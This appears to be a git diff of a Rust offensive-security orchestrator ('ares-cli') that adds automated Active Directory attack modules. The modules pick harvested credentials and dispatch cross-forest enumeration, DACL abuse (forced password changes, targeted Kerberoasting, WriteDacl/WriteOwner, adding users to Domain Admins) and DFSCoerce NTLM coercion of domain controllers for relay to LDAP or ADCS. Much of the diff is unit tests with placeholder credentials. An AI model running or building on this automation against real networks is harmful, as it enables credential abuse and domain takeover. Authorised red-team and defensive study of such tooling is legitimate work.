"child.fabrikam.local", + false, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert_eq!( + fab_work.unwrap().credential.username, + "forestuser", + "same-forest credential should be preferred over cross-forest" + ); + } + + #[tokio::test] + async fn collect_skips_quarantined_credentials() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Only credential is quarantined + s.credentials.push(make_cred( + "c1", + "baduser", + "P@ssw0rd!", + "contoso.local", + true, + )); // pragma: allowlist secret + s.quarantined_credentials.insert( + "baduser@contoso.local".into(), + chrono::Utc::now() + chrono::Duration::seconds(300), + ); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!( + work.iter().all(|w| w.credential.username != "baduser"), + "quarantined credentials should be skipped" + ); + } + + #[tokio::test] + async fn collect_skips_empty_password_credentials() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Only credential has empty password + s.credentials + .push(make_cred("c1", "nopass", "", "contoso.local", true)); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + // No usable credential → should produce no work for fabrikam + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "empty password credentials should not produce work" + ); + } + + #[tokio::test] + async fn collect_skips_already_processed_dedup_key() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + s.credentials + .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); // pragma: allowlist secret + // Pre-mark the dedup key as processed + let key = cross_forest_dedup_key("fabrikam.local", "admin", "contoso.local"); + s.mark_processed(DEDUP_CROSS_FOREST_ENUM, key); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "already-processed dedup key should be skipped" + ); + } + + #[tokio::test] + async fn collect_under_enumerated_flag_when_few_users() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 2 fabrikam creds (< 3 = under-enumerated) + s.credentials.push(make_cred( + "c1", + "user1", + "P@ssw0rd!", + "fabrikam.local", + false, + )); // pragma: allowlist secret + s.credentials.push(make_cred( + "c2", + "user2", + "P@ssw0rd!", + "fabrikam.local", + false, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert!( + fab_work.unwrap().is_under_enumerated, + "domain with < 3 users should be marked under-enumerated" + ); + } + + #[tokio::test] + async fn collect_not_under_enumerated_with_three_users() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 3 fabrikam creds (>= 3 = not under-enumerated, but < 5 so still triggers enum) + for i in 0..3 { + s.credentials.push(make_cred( + &format!("c{i}"), + &format!("user{i}"), + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + false, + )); + } + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert!( + !fab_work.unwrap().is_under_enumerated, + "domain with >= 3 users should not be marked under-enumerated" + ); + } +} diff --git a/ares-cli/src/orchestrator/automation/dacl_abuse.rs b/ares-cli/src/orchestrator/automation/dacl_abuse.rs new file mode 100644 index 00000000..dc0a64d1 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/dacl_abuse.rs @@ -0,0 +1,1000 @@ +//! auto_dacl_abuse -- direct ACL abuse for known attack paths. +//! +//! Unlike acl_chain_follow (which requires BloodHound to populate acl_chains), +//! this module proactively dispatches known ACL abuse techniques when: +//! - A credential is available for a user known to have dangerous permissions +//! - The target object exists in the domain +//! +//! Covers: ForceChangePassword, GenericWrite (targeted Kerberoast), WriteDacl, +//! WriteOwner, GenericAll. Each abuse type maps to a specific tool invocation +//! (e.g., net rpc password for ForceChangePassword, bloodyAD for GenericWrite). + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dispatches ACL abuse when matching credentials + bloodhound paths exist. +/// Interval: 30s. +pub async fn auto_dacl_abuse(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("dacl_abuse") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_dacl_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "dacl_abuse", + "acl_type": item.vuln_type, + "vuln_id": item.vuln_id, + "source_user": item.source_user, + "target_user": item.target_user, + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("dacl_abuse"); + match dispatcher + .throttled_submit("acl_chain_step", "acl", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + vuln_id = %item.vuln_id, + acl_type = %item.vuln_type, + source = %item.source_user, + target = %item.target_user, + "DACL abuse dispatched" + ); + { + let mut state = dispatcher.state.write().await; + state.mark_processed(DEDUP_DACL_ABUSE, item.dedup_key.clone()); + } + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DACL_ABUSE, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(vuln_id = %item.vuln_id, "DACL abuse deferred"); + } + Err(e) => { + warn!(err = %e, vuln_id = %item.vuln_id, "Failed to dispatch DACL abuse"); + } + } + } + } +} + +/// Collect DACL abuse work items from state without holding async locks. +/// +/// Extracted for testability: scans `discovered_vulnerabilities` for ACL-type +/// vulns that have a matching credential and haven't been processed yet. +fn collect_dacl_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + // Check discovered_vulnerabilities for ACL-related vulns + // (populated by BloodHound analysis or recon agents) + for vuln in state.discovered_vulnerabilities.values() { + let vtype = vuln.vuln_type.to_lowercase(); + + let is_acl_vuln = vtype.contains("forcechangepassword") + || vtype.contains("genericwrite") + || vtype.contains("writedacl") + || vtype.contains("writeowner") + || vtype.contains("genericall") + || vtype.contains("self_membership") + || vtype.contains("write_membership"); + + if !is_acl_vuln { + continue; + } + + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + continue; + } + + let dedup_key = format!("dacl:{}", vuln.vuln_id); + if state.is_processed(DEDUP_DACL_ABUSE, &dedup_key) { + continue; + } + + // Extract source user from vuln details + let source_user = vuln + .details + .get("source") + .or_else(|| vuln.details.get("source_user")) + .or_else(|| vuln.details.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + + let source_domain = vuln + .details + .get("source_domain") + .or_else(|| vuln.details.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + + if source_user.is_empty() { + continue; + } + + // Find matching credential + let cred = state + .credentials + .iter() + .find(|c| { + c.username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || c.domain.to_lowercase() == source_domain.to_lowercase()) + }) + .cloned(); + + if let Some(cred) = cred { + let target_user = vuln + .details + .get("target") + .or_else(|| vuln.details.get("target_user")) + .or_else(|| vuln.details.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let dc_ip = state + .domain_controllers + .get(&cred.domain.to_lowercase()) + .cloned() + .unwrap_or_default(); + + items.push(DaclWork { + dedup_key, + vuln_id: vuln.vuln_id.clone(), + vuln_type: vtype, + source_user: source_user.to_string(), + target_user, + domain: cred.domain.clone(), + dc_ip, + credential: cred, + }); + } + } + + items +} + +struct DaclWork { + dedup_key: String, + vuln_id: String, + vuln_type: String, + source_user: String, + target_user: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("dacl:{}", "vuln-acl-001"); + assert_eq!(key, "dacl:vuln-acl-001"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_DACL_ABUSE, "dacl_abuse"); + } + + #[test] + fn acl_vuln_type_matching() { + let positives = [ + "ForceChangePassword", + "GenericWrite", + "WriteDacl", + "WriteOwner", + "GenericAll", + "self_membership", + "write_membership", + "SomePrefix_forcechangepassword_suffix", + ]; + for t in &positives { + let vtype = t.to_lowercase(); + let is_acl_vuln = vtype.contains("forcechangepassword") + || vtype.contains("genericwrite") + || vtype.contains("writedacl") + || vtype.contains("writeowner") + || vtype.contains("genericall") + || vtype.contains("self_membership") + || vtype.contains("write_membership"); + assert!(is_acl_vuln, "{t} should match as ACL vuln"); + } + } + + #[test] + fn non_acl_vuln_types_rejected() { + let negatives = [ + "smb_signing_disabled", + "mssql_access", + "zerologon", + "esc1", + "kerberoast", + ]; + for t in &negatives { + let vtype = t.to_lowercase(); + let is_acl_vuln = vtype.contains("forcechangepassword") + || vtype.contains("genericwrite") + || vtype.contains("writedacl") + || vtype.contains("writeowner") + || vtype.contains("genericall") + || vtype.contains("self_membership") + || vtype.contains("write_membership"); + assert!(!is_acl_vuln, "{t} should NOT match as ACL vuln"); + } + } + + #[test] + fn source_user_extraction_keys() { + // Verify the fallback chain for source user extraction + let details = serde_json::json!({ + "source": "admin", + "source_user": "admin2", + "from": "admin3", + }); + let source = details + .get("source") + .or_else(|| details.get("source_user")) + .or_else(|| details.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source, "admin"); + + // Fallback to source_user + let details2 = serde_json::json!({ + "source_user": "admin2", + }); + let source2 = details2 + .get("source") + .or_else(|| details2.get("source_user")) + .or_else(|| details2.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source2, "admin2"); + + // No source returns empty + let details3 = serde_json::json!({}); + let source3 = details3 + .get("source") + .or_else(|| details3.get("source_user")) + .or_else(|| details3.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source3, ""); + } + + #[test] + fn source_domain_extraction_keys() { + let details = serde_json::json!({"source_domain": "contoso.local"}); + let source_domain = details + .get("source_domain") + .or_else(|| details.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source_domain, "contoso.local"); + + let details2 = serde_json::json!({"domain": "fabrikam.local"}); + let source_domain2 = details2 + .get("source_domain") + .or_else(|| details2.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source_domain2, "fabrikam.local"); + + let details3 = serde_json::json!({}); + let source_domain3 = details3 + .get("source_domain") + .or_else(|| details3.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source_domain3, ""); + } + + #[test] + fn target_user_extraction_keys() { + let details = serde_json::json!({"target": "victim", "target_user": "v2", "to": "v3"}); + let target = details + .get("target") + .or_else(|| details.get("target_user")) + .or_else(|| details.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(target, "victim"); + + let details2 = serde_json::json!({"target_user": "v2"}); + let target2 = details2 + .get("target") + .or_else(|| details2.get("target_user")) + .or_else(|| details2.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(target2, "v2"); + + let details3 = serde_json::json!({"to": "v3"}); + let target3 = details3 + .get("target") + .or_else(|| details3.get("target_user")) + .or_else(|| details3.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(target3, "v3"); + } + + #[test] + fn credential_matching_with_domain() { + let source_user = "admin"; + let source_domain = "contoso.local"; + let cred_username = "Admin"; + let cred_domain = "CONTOSO.LOCAL"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(matches); + } + + #[test] + fn credential_matching_without_domain() { + let source_user = "admin"; + let source_domain = ""; + let cred_username = "admin"; + let cred_domain = "contoso.local"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(matches); + } + + #[test] + fn credential_matching_wrong_user() { + let source_user = "admin"; + let source_domain = "contoso.local"; + let cred_username = "jdoe"; + let cred_domain = "contoso.local"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(!matches); + } + + #[test] + fn credential_matching_wrong_domain() { + let source_user = "admin"; + let source_domain = "contoso.local"; + let cred_username = "admin"; + let cred_domain = "fabrikam.local"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(!matches); + } + + #[test] + fn dacl_payload_structure() { + let payload = serde_json::json!({ + "technique": "dacl_abuse", + "acl_type": "forcechangepassword", + "vuln_id": "vuln-acl-001", + "source_user": "admin", + "target_user": "victim", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "dacl_abuse"); + assert_eq!(payload["acl_type"], "forcechangepassword"); + assert_eq!(payload["source_user"], "admin"); + assert_eq!(payload["target_user"], "victim"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn acl_vuln_type_case_insensitive() { + for t in [ + "ForceChangePassword", + "FORCECHANGEPASSWORD", + "forcechangepassword", + ] { + let vtype = t.to_lowercase(); + assert!(vtype.contains("forcechangepassword"), "{t} should match"); + } + } + + #[test] + fn source_user_from_key() { + let details = serde_json::json!({"from": "svc_account"}); + let source = details + .get("source") + .or_else(|| details.get("source_user")) + .or_else(|| details.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source, "svc_account"); + } + + // -- collect_dacl_work integration tests -- + + use crate::orchestrator::state::SharedState; + use ares_core::models::{Credential, VulnerabilityInfo}; + use std::collections::HashMap; + + fn make_credential(username: &str, domain: &str) -> Credential { + Credential { + id: format!("cred-{username}"), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + fn make_vuln( + vuln_id: &str, + vuln_type: &str, + details: HashMap, + ) -> VulnerabilityInfo { + VulnerabilityInfo { + vuln_id: vuln_id.to_string(), + vuln_type: vuln_type.to_string(), + target: "192.168.58.10".to_string(), + discovered_by: "bloodhound".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 5, + } + } + + fn acl_details(source: &str, target: &str, domain: &str) -> HashMap { + let mut m = HashMap::new(); + m.insert("source".to_string(), serde_json::json!(source)); + m.insert("target".to_string(), serde_json::json!(target)); + m.insert("source_domain".to_string(), serde_json::json!(domain)); + m + } + + #[tokio::test] + async fn collect_empty_state_no_work() { + let shared = SharedState::new("test".into()); + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_credentials_no_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-001", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_forcechangepassword_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-001", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "forcechangepassword"); + assert_eq!(work[0].source_user, "admin"); + assert_eq!(work[0].target_user, "victim"); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[tokio::test] + async fn collect_genericwrite_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("svc_sql", "contoso.local")); + let details = acl_details("svc_sql", "targetuser", "contoso.local"); + let vuln = make_vuln("vuln-gw-001", "GenericWrite", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "genericwrite"); + } + + #[tokio::test] + async fn collect_writedacl_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("operator", "contoso.local")); + let details = acl_details("operator", "targetobj", "contoso.local"); + let vuln = make_vuln("vuln-wd-001", "WriteDacl", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "writedacl"); + } + + #[tokio::test] + async fn collect_writeowner_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("operator", "contoso.local")); + let details = acl_details("operator", "targetobj", "contoso.local"); + let vuln = make_vuln("vuln-wo-001", "WriteOwner", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "writeowner"); + } + + #[tokio::test] + async fn collect_genericall_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-ga-001", "GenericAll", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "genericall"); + } + + #[tokio::test] + async fn collect_self_membership_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("user1", "contoso.local")); + let details = acl_details("user1", "Domain Admins", "contoso.local"); + let vuln = make_vuln("vuln-sm-001", "self_membership", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "self_membership"); + } + + #[tokio::test] + async fn collect_write_membership_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("user1", "contoso.local")); + let details = acl_details("user1", "Domain Admins", "contoso.local"); + let vuln = make_vuln("vuln-wm-001", "write_membership", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "write_membership"); + } + + #[tokio::test] + async fn collect_non_acl_vuln_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "dc01", "contoso.local"); + let vuln = make_vuln("vuln-smb-001", "smb_signing_disabled", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_already_exploited_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-002", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + state + .exploited_vulnerabilities + .insert("vuln-fcp-002".to_string()); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_already_processed_dedup_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-003", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + state.mark_processed(DEDUP_DACL_ABUSE, "dacl:vuln-fcp-003".to_string()); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_source_user_empty_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let mut details = HashMap::new(); + details.insert("target".to_string(), serde_json::json!("victim")); + let vuln = make_vuln("vuln-fcp-004", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_matching_credential_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("otheruser", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-005", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_case_insensitive_credential_match() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("Admin", "CONTOSO.LOCAL")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-006", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].source_user, "admin"); + } + + #[tokio::test] + async fn collect_dc_ip_resolved_from_domain_controllers() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + state + .domain_controllers + .insert("contoso.local".to_string(), "192.168.58.10".to_string()); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-007", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + } + + #[tokio::test] + async fn collect_dc_ip_empty_when_no_dc_mapping() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-008", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, ""); + } + + #[tokio::test] + async fn collect_credential_domain_mismatch_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "fabrikam.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-009", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_empty_source_domain_matches_any_cred_domain() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "fabrikam.local")); + let mut details = HashMap::new(); + details.insert("source".to_string(), serde_json::json!("admin")); + details.insert("target".to_string(), serde_json::json!("victim")); + let vuln = make_vuln("vuln-fcp-010", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_multiple_vulns_produces_multiple_work_items() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + + for (i, vtype) in ["ForceChangePassword", "GenericAll", "WriteDacl"] + .iter() + .enumerate() + { + let details = acl_details("admin", &format!("target{i}"), "contoso.local"); + let vuln = make_vuln(&format!("vuln-multi-{i}"), vtype, details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 3); + } + + #[tokio::test] + async fn collect_dedup_key_format_matches() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-dk-001", "GenericAll", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "dacl:vuln-dk-001"); + } + + #[tokio::test] + async fn collect_source_user_fallback_to_from_key() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("svc_account", "contoso.local")); + let mut details = HashMap::new(); + details.insert("from".to_string(), serde_json::json!("svc_account")); + details.insert("target".to_string(), serde_json::json!("victim")); + details.insert( + "source_domain".to_string(), + serde_json::json!("contoso.local"), + ); + let vuln = make_vuln("vuln-from-001", "GenericWrite", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].source_user, "svc_account"); + } + + #[tokio::test] + async fn collect_target_user_fallback_to_target_user_key() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let mut details = HashMap::new(); + details.insert("source".to_string(), serde_json::json!("admin")); + details.insert( + "target_user".to_string(), + serde_json::json!("fallback_target"), + ); + details.insert( + "source_domain".to_string(), + serde_json::json!("contoso.local"), + ); + let vuln = make_vuln("vuln-tu-001", "WriteDacl", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "fallback_target"); + } +} diff --git a/ares-cli/src/orchestrator/automation/dfs_coercion.rs b/ares-cli/src/orchestrator/automation/dfs_coercion.rs new file mode 100644 index 00000000..ad9bc889 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/dfs_coercion.rs @@ -0,0 +1,450 @@ +//! auto_dfs_coercion -- trigger DFSCoerce (MS-DFSNM) NTLM coercion against DCs. +//! +//! DFSCoerce abuses the MS-DFSNM protocol (Distributed File System Namespace +//! Management) to force a DC to authenticate to an attacker listener. Unlike +//! PetitPotam, DFSCoerce requires valid domain credentials but works on +//! systems where PetitPotam's unauthenticated path has been patched. +//! +//! The captured NTLM auth can be relayed to LDAP (shadow creds, RBCD) or +//! ADCS web enrollment (ESC8). + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect DFS coercion work items from current state. +/// +/// Pure logic extracted from `auto_dfs_coercion` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_dfs_coercion_work(state: &StateInner, listener: &str) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + if dc_ip.as_str() == listener { + continue; + } + + let dedup_key = format!("dfs_coerce:{dc_ip}"); + if state.is_processed(DEDUP_DFS_COERCION, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(DfsWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + listener: listener.to_string(), + credential: cred, + }); + } + + items +} + +/// Dispatches DFSCoerce against each DC that hasn't been DFS-coerced. +/// Interval: 45s. +pub async fn auto_dfs_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); 